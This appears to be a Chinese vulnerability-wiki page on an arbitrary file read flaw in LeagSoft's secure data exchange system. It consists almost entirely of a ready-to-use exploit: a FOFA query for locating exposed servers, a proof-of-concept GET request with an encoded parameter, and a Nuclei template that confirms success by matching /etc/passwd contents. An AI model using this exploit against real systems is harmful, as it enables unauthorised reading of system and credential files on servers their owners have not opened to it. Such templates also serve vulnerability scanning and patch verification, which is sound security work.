跳到主要内容

联软安全数据交换系统任意文件读取

联软安全数据交换系统任意文件读取

fofa

body="UniExServices"

poc

/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI=

nuclei

id: leagsoft-safedata-exchange-file-fileread

info:
name: 联软安全数据交换系统任意文件读取
author: mmy
severity: high
tags: leagsoft,fileread
description: 联软安全数据交换系统任意文件读取
reference:
-
metadata:
fofa-query: 'body="UniExServices"'
verified: true
max-request: 1

http:
- method: GET
path:
- "{{RootURL}}/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI="

matchers:
- type: regex
part: body
regex:
- "root:[x*]:0:0:"